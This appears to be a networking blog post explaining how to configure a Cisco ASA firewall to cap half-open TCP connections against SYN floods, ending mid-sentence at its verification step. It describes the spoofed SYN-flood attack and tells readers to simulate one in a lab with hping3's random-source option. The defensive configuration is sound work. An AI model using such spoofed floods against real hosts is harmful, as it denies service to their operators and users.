An attacker can launch a DOS attack by flooding a host with thousands of TCP SYN packets, the source address would be spoofed with no way for the host server to respond, this would create half-open TCP connections on the host consuming resources until the host is overwhelmed and packets are dropped.

With the Cisco ASA firewall you can configure the Modular Policy Framework (MPF) to restrict the number of TCP half-open connections (embryonic-conn-max). When enabled, the MPF policy will intercept the tcp SYN and only forward the connection once the 3-way handshake is complete.

This blog post describes the steps use in order to limit half-open connections and to demonstrate this in action using hping3 tool, to simulate an attack.

Define Access Control List

access-list INTCPT_SVR01 permit tcp any host 192.168.10.5 eq 80

Create Class Map

class-map CM_INTCPT_SVR01
 match access-list INTCPT_SVR01

Create Policy Map

policy-map PM_INTCPT_SVR01
 class CM_INTCPT_SVR01
  set connection embryonic-conn-max 40

Assign to Service Policy

service-policy PM_INTCPT_SVR01 interface OUTSIDE

Verification

Using hping3 (available to download via linux) send an attack to the target host machine (in this instance 1.1.1.10 on port 8080, which is natted to the real IP address 192.168.10.5 on port 80).  Use the variable “–rand-source” to simulate multiple individual connection attempts, these source addresses in the lab will be spoofed.

On the ASA run the command show service-policy interface OUTSIDE you can determine the number of embryonic connections.

If logging is enabled on the ASA you should be able to see the following